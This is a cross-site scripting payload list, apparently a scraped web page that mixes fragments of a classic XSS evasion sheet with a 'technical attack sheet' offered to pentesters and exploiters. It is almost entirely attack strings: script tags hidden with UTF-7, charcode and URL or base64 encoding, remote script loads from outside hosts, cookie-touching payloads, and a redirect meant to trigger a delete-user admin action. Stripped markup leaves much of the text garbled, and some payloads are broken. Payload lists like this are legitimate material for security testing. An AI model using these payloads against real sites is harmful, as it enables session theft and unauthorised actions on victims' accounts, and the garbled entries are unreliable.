// Useful in-case of payload restrictions. // Works upto IE7. // Works upto IE7. // Works upto IE7 click // By @secalert // By Mario // By @secalert click // By Ashar Javed // Works With All Browsers ">'> '';!--"=&{()} "> < XSS exp/* ¼script¾alert(¢XSS¢)¼/script¾ EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: org/xss.swf" AllowScriptAccess="always"> a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); "> echo('alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS _________ _________.__ __ _________ .__ __ .__ \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____ / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\ \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ > \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ / \/ \/ \/ \/ \/ \/ \/ |__| \//_____/ Information: A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have some good results you can use the following list with automatic scripts, software or for manually pentesting. This list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon. Note: This is a technical attack sheet for cross site penetrationtests. Cross Site Scripting Strings with TAG: CrossSiteScripting ¼script¾document.cookie=true;¼/script¾ exp/* ]] echo('document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- & &{document.cookie=true;}; < ; ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with close TAG: >" >" >" >" >" >" >" >" >" >" >"a=/CrossSiteScripting/\ndocument.cookie=true; >" >" >" >" >" >" >" >" >" >" >"CrossSiteScripting >"¼script¾document.cookie=true;¼/script¾ >" >" >" >" >" >" >" >" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >" echo('document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >" >" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >" >" >" >" >" >" >" >"< >" >" >" >" >" >"; >" ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings with negative value & TAG: -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1CrossSiteScripting -1¼script¾document.cookie=true;¼/script¾ -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1exp/* -1 -1 -1 -1 -1 -1 -1]] -1 -1 -1 echo('document.cookie=true'); ?> -1 +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1 -1 -1 -1 -1 -1 -1& -1&{document.cookie=true;}; -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1 -1< -1 -1 -1 -1 -1 -1; -1 ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> Cross Site Scripting Strings Restriction Bypass Mail: >"@gmail.com >"alert(document.cookie)@gmail.com @gmail.com 1337 "> 1337+1 Cross Site Scripting Strings Restriction Bypass Obfuscation >“ >" Cross Site Scripting Strings Restriction Bypass String to Charcode String:fr om.Char.Code ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//-->">'> '';!--"=&{()} Cross Site Scripting Strings Restriction Bypass encoded frame url %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E Cross Site Scripting Strings via Console: set vlan name 1337 set system name set system location ">alert('VL') insert add add user @gmail.com add topic add name perl -e 'print "";' > out perl -e 'print "alert(\"CrossSiteScripting\")";' > out Cross Site Scripting Strings on per line validation applications: Cross Site Scripting Strings Embed: Cross Site Scripting Strings Action Script: < PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"> "> +ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4- CrossSiteScripting CrossSiteScripting CrossSiteScripting CrossSiteScripting CrossSiteScripting \";alert('CrossSiteScripting');// ¼script¾alert(¢CrossSiteScripting¢)¼/script¾ exp/* a="get"; b="URL(\""; c="javascript:"; d="alert('CrossSiteScripting');\")"; eval(v+l+a+b); CrossSiteScripting ]]> <IMG SRC="javascript:alert('CrossSiteScripting')"> echo('alert("CrossSiteScripting")'); ?> Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser eval("prompt(3)") "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> "> [Click here](javascript:alert(1)) "> '|alert('xss')|' +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- #onmouseover=prompt(1) "> %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E <iframe src=http://test.de> <iframe src=http://test.de> PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+ javascript:alert(1) "> "> "> /onstart=confirm(1)> // Save // Works with IE8 . // Save // Works with IE8 .
. // Save // Works with IE8 .
.